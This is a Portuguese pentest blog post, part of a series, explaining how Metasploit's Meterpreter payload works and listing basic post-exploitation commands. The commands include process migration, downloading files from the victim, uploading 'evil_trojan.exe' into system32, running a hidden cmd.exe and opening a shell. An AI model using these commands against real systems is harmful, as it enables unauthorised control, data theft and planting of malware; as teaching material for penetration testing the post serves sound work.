– root@injetionsec:~#

Comandos do metasploit – part 3

26.09.2014 (9:55 pm) – Filed under: Pentest ::

Veja :

comandos do metasploit – parte 1
comandos do metasploit – parte 2

Vamos falar um pouco do meterpreter galera,

Meterpreter : o meterpreter e um payload avançado,como ja falamos um injeção em DDL,se comunica atraves de sockets,com API em ruby e como ele funciona,vejamos

– Carrega a DLL com a carga do payload e injetando na DLL
– O nucleo do meterpreter estabelece uma conexão enviando assim um GET , e assim o metasploit recebe o GET e configura o cliente
– por ultimo os payloads do meterpreter carrga os modulos proporcinando assim acesso adminisrativos

– O meterpreter resite na memoria não escrevendo nada em disco
– Não e criado um novo processo com o meterpreter ele injeta um processo comprometido e pode migragar para outros processo que estão em execução com maior facilidade
– Utiliza comunicação cifrada
– Praticas forences convencionais são dificeis de ver os rastros
– Meterpreter utiliza um sistema de comunicações canalizado
– Todos esses processos são transparentes e completam isso tudo em 1 segundo.

vejamos alguns comandos do meterpreter

– help : e um comando que mostra um menu de ajuda do meterpreter

meterpreter > help

– backtround : esde comando envia a sessão atual do meterpreter para segundo plano,para voltar para sessão atual simplesmente digite o seguinte comando “sessions -i 1”

– ps : este comando mostras os processos que esta sendo executado na maquina alvo

meterpreter > ps

– migrate : com esse comando podemos migra para outro processo da vitima

meterpreter > run post/windows/manage/migrate

– ls : lista o diretorio que estamos

meterpreter > ls

– download : pode fazer um download de qualquer arquivo (utilize \\)

meterpreter > download c:\\boot.ini

– upload : podemos fazer um upload de por exemplo um arquivo qualquer ou arquivo malicioso (utilize \\)

meterpreter > upload evil_trojan.exe c:\\windows\\system32

– ifconfig : esse comando mostra as configurações da interface de rede

meterpreter > ifconfig

– getuid : este comando mostra o usuario ue esta sendo executado naquele determinado host

meterpreter > getuid

– execute : esse comando executa um determinado comando

meterpreter > execute -f cmd.exe -i -H

– shell : este comando apresenta o shell do sistema

meterpreter > shell

– idletime : esse comando mostra quanto tempo a maquina esta ativada

meterpreter > idletime

Bem galera esse foram alguns dos comando básico do meterpreter , ate o próximo tópico =)